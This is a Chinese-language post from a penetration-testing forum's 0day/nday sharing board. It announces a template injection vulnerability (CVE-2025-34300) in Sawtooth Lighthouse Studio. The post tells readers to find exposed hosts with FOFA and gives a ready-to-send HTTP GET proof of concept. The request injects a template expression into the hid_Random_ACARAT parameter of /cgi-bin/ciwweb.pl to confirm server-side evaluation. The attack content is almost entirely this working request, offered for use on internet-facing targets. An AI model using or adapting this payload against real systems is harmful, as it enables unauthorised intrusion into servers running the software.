设为首页收藏本站
切换到宽版

吾要学习网

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
吾要学习网»论坛 渗透测试 0day/nday分享区 Sawtooth Lighthouse Studio存在模板注入漏洞CVE-2025-3 ...
返回列表 发新帖
查看: 151|回复: 0

Sawtooth Lighthouse Studio存在模板注入漏洞CVE-2025-34300

[复制链接]
admin
  • TA的每日心情
    无聊
    昨天 09:04

    • 签到天数: 17 天

    [LV.4]偶尔看看III

    347

    主题

    348

    帖子

    2157

    积分

    管理员

    Rank: 9Rank: 9Rank: 9

    积分
    2157
    发表于 2025-9-9 17:20:09 | 显示全部楼层 |阅读模式
    Sawtooth Lighthouse Studio存在模板注入漏洞
    CVE编号:CVE-2025-34300
    资产确定:
    FOFA
    游客,如果您要查看本帖隐藏内容请回复

    漏洞链接:https://xx.xx.xx.xx/cgi-bin/ciww ... &hid_Random_ACARAT=[%25123*321%25]&hid_Random_ACARAT=x

    POC

    GET /cgi-bin/ciwweb.pl?hid_javascript=1&hid_Random_ACARAT=[%25123*321%25]&hid_Random_ACARAT=x HTTP/1.1
    Host: xx.xx.xx.xx
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
    Accept: */*
    Connection: Keep-Alive
    ========================================================================================



    回复

    使用道具 举报

    返回列表 发新帖
    高级模式
    B Color Image Link Quote Code Smilies
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    QQ|小黑屋|吾要学习网 ( 陕ICP备2025065860号-1 )|网站地图|陕公网安备61010302001313号

    GMT+8, 2025-10-11 06:11 , Processed in 0.078922 second(s), 24 queries .

    Powered by 吾要学习

    Copyright © 2001-2025, wuyaoxuexi.cn.

    快速回复 返回顶部 返回列表